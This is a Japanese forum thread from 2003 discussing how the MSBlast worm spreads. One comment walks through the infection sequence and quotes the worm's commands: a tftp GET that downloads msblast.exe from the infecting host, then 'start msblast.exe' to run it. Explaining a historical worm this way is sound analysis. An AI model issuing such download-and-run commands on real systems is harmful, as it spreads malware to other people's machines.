パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

WindowsUpdateに攻撃するワーム」記事へのコメント

  • by Anonymous Coward
    勤務先では Windows 98 を使っているので、影響はありませんでした。

    ところで、このウィルス、感染ファイルが TFTP ということなのですが、Windows Update って TFTP を使ってるのでしょうか?

    ご存じの方教えてください。
    • by Anonymous Coward
      > ところで、このウィルス、感染ファイルが TFTP ということなのですが、

      「感染ファイルが TFTP」ってどういう意味での発言でしょうか?
      TFTP.EXEに感染とかそういうこと?
      • trendmicroの情報 [trendmicro.co.jp]によると
        > ワームは自身のTFTPサーバ機能を持っており、感染元コンピュータのポート69番を使用してTFTPサーバとして機能します。

        だそうなので、msblast.exe自体がtftpサーバで、バ
        • by kenston (12394) on 2003年08月13日 12時27分 (#378056)

          まず、第一波として感染PCからポート135に攻撃が着ます。RPCの脆弱性がある場合、ワームのコードが実行されポート4444が開かれます。そして第二波として感染PCからポート4444に

          tftp -i IPアドレス GET msblast.exe

          というテキストデータが着ます。で、最初の第一波のコードがこれをcmd.exeで実行させます。IPアドレスというのは感染して今ワームのコードを送ってきているPCのIPアドレスです。その感染PCではmsblast.exeが動いていて、ポート69で待機しています。tftpが終了するか約20秒経過すると

          start msblast.exe
          msblast.exe

          がポート4444に着ます。そこでDownloadされたmsblast.exeが実行されます。それで今度は自分が感染PCになるわけです。

          第一波でポート4444が開く前に第二波が着てしまった場合とか、tftpによるmsblast.exeのDownloadが終了する前に約20秒経ってしまったときには失敗します。

          親コメント

目玉の数さえ十分あれば、どんなバグも深刻ではない -- Eric Raymond

処理中...